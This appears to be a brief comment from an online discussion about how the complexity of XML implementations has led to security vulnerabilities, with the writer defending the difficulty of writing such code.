But really I was just looking for a concrete example where I know the complexity of the implementation has definitely caused vulnerabilities, whether or not the choice to use it to solve the problem at hand was sensible. I have zero love for XML.
You (anyone, not you personally) write that much code yourself and let's see how well you did in comparison.